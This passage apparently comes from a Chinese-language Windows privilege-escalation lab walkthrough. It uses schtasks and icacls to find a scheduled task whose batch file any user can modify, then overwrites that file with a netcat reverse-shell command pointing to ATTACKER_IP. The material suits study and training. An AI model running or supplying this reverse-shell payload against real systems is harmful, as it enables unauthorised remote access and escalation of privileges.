我们可以使用 schtasks列出所有的计划任务,下面我们以一个计划任务为例讲解

    1. C:\> schtasks /query /tn vulntask /fo list /v
    2. Folder: \
    3. HostName:                             THM-PC1
    4. TaskName:                             \vulntask
    5. Task To Run:                          C:\tasks\schtask.bat
    6. Run As User:                          taskusr1

    查看当前用户对计划任务文件的权限

    1. C:\> icacls c:\tasks\schtask.bat
    2. c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F)
    3.                     BUILTIN\Administrators:(I)(F)
    4.                     BUILTIN\Users:(I)(F)

    从结果中我们可以看到 BUILTIN\Users 对目标文件存在完全访问权限,那么我们可以修改 .bat 文件来插入有效载荷

    1. C:\> echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat